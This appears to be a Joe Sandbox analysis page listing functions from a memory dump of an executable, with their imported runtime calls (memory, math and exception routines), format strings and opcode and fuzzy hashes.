API ID: freemallocmemcpy
String ID: %.*s$#CLOSE$#COLLAPSE
API String ID: 3056473165-830562872
Opcode ID: 684e527e8d802f962bd2f23cf025675af8f6021cc4df3825c0dc6ff2fd68eb91
Instruction ID: 1eb89f394ee091dfa2ab3916fe6e18eec3282e46e2a6cd3114c42457d9e20f26
Opcode Fuzzy Hash: 684e527e8d802f962bd2f23cf025675af8f6021cc4df3825c0dc6ff2fd68eb91
Instruction Fuzzy Hash: 3E32B273A28685DBD719DB3AC5842F8B7A0FB59798F048735DB2997291DF38B460CB00

Function 00007FF674152210 Relevance: 6.3, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674152292
memcpy.VCRUNTIME140 ref: 00007FF6741522B5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741522D8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415235C
memcpy.VCRUNTIME140 ref: 00007FF67415236C

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: mallocmemcpy$free
String ID:
API String ID: 798594229-0
Opcode ID: 0fae82c393424ee353d7ee3fbf6beceb1d1835196ecabe1d95df275554cd0b6a
Instruction ID: 197282f93677c8541e75ab55b154b8381e9c81d2bb6789d97fa67a6ae128fe53
Opcode Fuzzy Hash: 0fae82c393424ee353d7ee3fbf6beceb1d1835196ecabe1d95df275554cd0b6a
Instruction Fuzzy Hash: 7C416137619BC2C6EB50DF25A4881B8A3A0FB84B94F185636DE5DC7799DF38E481CB10

Function 00007FF67416DEF0 Relevance: 6.3, APIs: 4, Instructions: 345COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416E066
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416E084
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416E3AB
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416E40D

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 7fcae04e762ba6a171d7b05269782bddc50ef9e2a3e56b70d57abb80ea3f3081
Instruction ID: 3cc894760eeb89ca4d467e75c5143a013b76ec64dbf8eed6874bf2b4bfddd10e
Opcode Fuzzy Hash: 7fcae04e762ba6a171d7b05269782bddc50ef9e2a3e56b70d57abb80ea3f3081
Instruction Fuzzy Hash: 83E10C33E2878DC5E213A73B50851B97390AF6E784F1DC732ED48B6561EF2AB591C501

Function 00007FF67416F7B0 Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416F936
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416F953
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416FBC0
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416FC0E

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 027569809ea2021a4c13de546010c86480e5b8bf7dba3485d0678649a7006ec2
Instruction ID: eb67fe80c7e6c4ce6deba1d1d2dd6186b1db95d6d0418c368d24a1ce98a32455
Opcode Fuzzy Hash: 027569809ea2021a4c13de546010c86480e5b8bf7dba3485d0678649a7006ec2
Instruction Fuzzy Hash: A3E1B833D2DACDC5E253A63750861F9A390AF6E384F1DDB32ED98B51B1EF29B1818501

Function 00007FF67416FD90 Relevance: 6.3, APIs: 4, Instructions: 321COMMON

Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416FF29
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416FF40
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67417018B
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6741701E4

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 3808054c5ae7bf1a53d280862de973172eeb55c374488943f47bc97568e5a8f5
Instruction ID: 6e1bcab7cdeb3d0aae73e9ec5a815db9e7e62a9987e7561a52261d11298e2cae
Opcode Fuzzy Hash: 3808054c5ae7bf1a53d280862de973172eeb55c374488943f47bc97568e5a8f5
Instruction Fuzzy Hash: B7E1F723D2CBC9C5E223A63694862F9B750AF6F3C5F199732ED48B51B2EF2975818500

Function 00007FF6741447C0 Relevance: 6.3, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741447E7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67414480C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674144831
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674144856
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67414487B

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 49b055fe289a3ccfddb74a1e8ee29bea9c1f4534a633c4789ff51beea63a1f94
Instruction ID: ec35677c7010c7554247dba36d942a5662f5853f40c863ba1182bd5af85febb4
Opcode Fuzzy Hash: 49b055fe289a3ccfddb74a1e8ee29bea9c1f4534a633c4789ff51beea63a1f94
Instruction Fuzzy Hash: 7B113722A6ABC2C6FE99AF95D89833423A0FF45F85F089535CD0DD7361DF2DA5018A50

Function 00007FF674166060 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 281COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140 ref: 00007FF6741664A0

Strings

%.*s, xrefs: 00007FF6741664CC
%*s%.*s, xrefs: 00007FF6741664F1
--------------------------------, xrefs: 00007FF67416640E

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memchr
String ID: %*s%.*s$ %.*s$--------------------------------
API String ID: 3297308162-2326682469
Opcode ID: b5728508ad553b0ff35536d9bdaed1d14f66f065b559a275ef1468c709f965f7
Instruction ID: 119d0ccc95a0653c0b787fb446a6cd23fdd142bbccac29ea1ce250127658dcf9
Opcode Fuzzy Hash: b5728508ad553b0ff35536d9bdaed1d14f66f065b559a275ef1468c709f965f7
Instruction Fuzzy Hash: 25E19A33A14A86C5E751DB35D0897F873A0EF69788F059336DE58A6295EF38A085C700

Function 00007FF6741772B0 Relevance: 6.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

APIs

__std_exception_destroy.VCRUNTIME140 ref: 00007FF6741773C1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741773ED
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417751B
__std_exception_copy.VCRUNTIME140 ref: 00007FF67417755D

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
String ID:
API String ID: 2138705365-0
Opcode ID: 39b9ac87aa205d46c67810882ff08debaae79012e678ac85721c9577327cf593
Instruction ID: 3661b2587e7760a889d414782ff934d88eeff0b3e4181bf045d0fc546ff4b15c
Opcode Fuzzy Hash: 39b9ac87aa205d46c67810882ff08debaae79012e678ac85721c9577327cf593
Instruction Fuzzy Hash: CA816CB3A28A85D1EB05EF29E58837D2365EB44F88F548032DA4D47669EF79E8D4C340

Function 00007FF6741581F0 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67415834C
floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF674158379
ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6741583A0
ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6741583C3

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: ceilffloorf
String ID:
API String ID: 300201839-0
Opcode ID: 310c4a4718882cd62701a14ea5a54184f80dd71cdfa5ec1aff0a3c4ec849eab5
Instruction ID: 7a147ce1f9cc97bdbca568db627f255b0bcf80dd4966c5e3dd01d8f45ba8843a
Opcode Fuzzy Hash: 310c4a4718882cd62701a14ea5a54184f80dd71cdfa5ec1aff0a3c4ec849eab5
Instruction Fuzzy Hash: D151EC33A2CBD185D3629F3191853F9B7A4BF69381F158332EA88A6655EF3DD491CB00

Function 00007FF67418B3B0 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF674177141), ref: 00007FF67418B4B3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF674177141), ref: 00007FF67418B506
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF674177141), ref: 00007FF67418B510
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418B55C

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: 41f41ca1953d7b413ce93713c78c4b82f14de955f7ee8bc639e98f23a1c68ac0
Instruction ID: e085b627a8d18df14e45d334d81ef0224398aa806c5aac9243647354248bb683
Opcode Fuzzy Hash: 41f41ca1953d7b413ce93713c78c4b82f14de955f7ee8bc639e98f23a1c68ac0
Instruction Fuzzy Hash: C741C062B25A41D1E914EB15E18817D6299BB44BF4F940731EA7D87BD9EE3CE046C304

Function 00007FF67418BD40 Relevance: 6.1, APIs: 4, Instructions: 120COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF6741729C8), ref: 00007FF67418BE41
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF6741729C8), ref: 00007FF67418BE54
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00007FF6741729C8), ref: 00007FF67418BEC7
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418BED4

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: cb7334bf99b79f2ae6454404cc3ca89f3216df2a7df3ece308a9828e93bf97ba
Instruction ID: e8c2554cd63ab3af4c3422663a32ea89940cfee5489187f78abc8482e9c0dca7
Opcode Fuzzy Hash: cb7334bf99b79f2ae6454404cc3ca89f3216df2a7df3ece308a9828e93bf97ba
Instruction Fuzzy Hash: 0441C023724A86C5EA14EB25D4882B96364FB08BF0F548635EB6D8BBD5DF3CE495C300

Function 00007FF674189ED0 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FF674189F00
memcpy.VCRUNTIME140 ref: 00007FF674189FC2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67418A015
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418A022

Part of subcall function 00007FF67418CF54: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF67418B925,?,?,?,?,?,00007FF674189E95), ref: 00007FF67418CF6E

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 1155477157-0
Opcode ID: 26c1260be44d7b5467445e5c0687545ac28577c52627bae4ab9c3b1bdae4856e
Instruction ID: 46d135a613c8112beb34879e0d5e3dbfac8e13cf054504aaf0f96e7a872ce4a6
Opcode Fuzzy Hash: 26c1260be44d7b5467445e5c0687545ac28577c52627bae4ab9c3b1bdae4856e
Instruction Fuzzy Hash: 4B31F563B29786C8FA19BB15D5883B956499B05FF4F544231DA2D87BC6DE3CF481C340

Function 00007FF67418B570 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000000,00000004,?,00007FF6741771EA), ref: 00007FF67418B652
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000004,?,00007FF6741771EA), ref: 00007FF67418B690
memcpy.VCRUNTIME140 ref: 00007FF67418B69A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418B6CF

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: 87cea115af44fe7f2d0e87bdb63a59dc65435fcd6c190dce4b22b5a2c9516a04
Instruction ID: 8e7786e773eaf069b23099338f8af6478c84c33a765c8943a88e505cd35c1676
Opcode Fuzzy Hash: 87cea115af44fe7f2d0e87bdb63a59dc65435fcd6c190dce4b22b5a2c9516a04
Instruction Fuzzy Hash: 8431B563B29785C5EE14EF12A5883B8A759AB04BF4F244631EE5D8BBD6DE7CE041C300

Function 00007FF67418BC10 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,00007FF6741729C8), ref: 00007FF67418BC7D

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 53b7d8dca0d1efab2b49221ca2de80cad4f06bd7fbd39ff0065455d8cf757108
Instruction ID: dbcfb5ccce380bb51f1916cdd4cb98deaec7ad2440dd6b627d6a9c526f2b9eab
Opcode Fuzzy Hash: 53b7d8dca0d1efab2b49221ca2de80cad4f06bd7fbd39ff0065455d8cf757108
Instruction Fuzzy Hash: A031E723B19786C9FA15AB65A58837861589F14BF4F240731EE2C477D6DE7CA4C38300

Function 00007FF67418B260 Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000,00000004,?,00007FF674177141), ref: 00007FF67418B33C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000004,?,00007FF674177141), ref: 00007FF67418B370
memcpy.VCRUNTIME140(?,?,00000000,00000004,?,00007FF674177141), ref: 00007FF67418B37A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418B3A3

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: cea8de1e166ba4e38c7eb499506cd0031c948df10273b4ce92276d505d523b81
Instruction ID: 587329e93b5d79ec4dc9455f32c8e12991ea079e94ce25964f5f850138ad1c50
Opcode Fuzzy Hash: cea8de1e166ba4e38c7eb499506cd0031c948df10273b4ce92276d505d523b81
Instruction Fuzzy Hash: C4318173B28785C5EE20EB1691882BDA359AB04BF4F544631EE6D877D5DE3CE041C200

Function 00007FF674189670 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,00007FF674172701), ref: 00007FF6741896DA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00007FF674172701), ref: 00007FF674189760
memcpy.VCRUNTIME140(00000000,?,?,00007FF674172701), ref: 00007FF674189786
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6741897AA

Part of subcall function 00007FF67418CF54: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF67418B925,?,?,?,?,?,00007FF674189E95), ref: 00007FF67418CF6E

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 1155477157-0
Opcode ID: d6b22d18f2aa62c32d368336290e2156c157205afbd35b8e764757cadaeeb0de
Instruction ID: 421f49a69ef8da8bd640ed6c76bf744c23a8c654c7a633834e7be227a8136d3e
Opcode Fuzzy Hash: d6b22d18f2aa62c32d368336290e2156c157205afbd35b8e764757cadaeeb0de
Instruction Fuzzy Hash: CE31A323A29745C1EA14AF1295882787299EB46BB4F244B30DA7E877D1DF3DF4928340

Function 00007FF67417E8B0 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E8E8
memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E988
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67417E9A6

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
